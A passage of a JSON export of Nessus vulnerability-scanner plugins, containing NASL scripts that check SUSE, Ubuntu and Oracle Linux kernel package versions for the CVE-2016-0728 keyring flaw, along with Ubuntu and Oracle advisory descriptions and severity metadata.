script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", 
reference:\"kernel-default-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-52.39.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-52.39.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:59", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2872-3.NASL", "href": "https://www.tenable.com/plugins/nessus/88016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88016);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-3\");\n\n script_name(english:\"Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.2-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-1020-raspi2\", pkgver:\"4.2.0-1020.27\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-raspi2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:46", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when 
joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-utopic vulnerability (USN-2873-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2873-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2873-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88017);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2873-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-utopic vulnerability (USN-2873-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2873-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.16-generic,\nlinux-image-3.16-generic-lpae and / or linux-image-3.16-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2873-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-59-generic\", pkgver:\"3.16.0-59.79~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-59-generic-lpae\", pkgver:\"3.16.0-59.79~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-59-lowlatency\", pkgver:\"3.16.0-59.79~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.16-generic / linux-image-3.16-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:47", "description": "The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2016-3510 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-01-21T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : kernel-uek (ELSA-2016-3510)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el6uek", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2016-3510.NASL", "href": "https://www.tenable.com/plugins/nessus/88033", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3510.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88033);\n script_version(\"2.14\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Oracle Linux 6 / 7 : kernel-uek (ELSA-2016-3510)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2016-3510 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1\n mishandles object references in a certain error case, which allows local users to gain privileges or cause\n a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2016-3510.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/11\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-32.1.2.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6 / 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['4.1.12-32.1.2.el6uek', '4.1.12-32.1.2.el7uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2016-3510');\n }\n }\n __rpm_report = 'Running KSplice level of ' 
+ trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '4.1';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'dtrace-modules-4.1.12-32.1.2.el6uek-0.5.1-1.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-32.1.2.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-32.1.2.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-32.1.2.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'},\n {'reference':'dtrace-modules-4.1.12-32.1.2.el7uek-0.5.1-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 
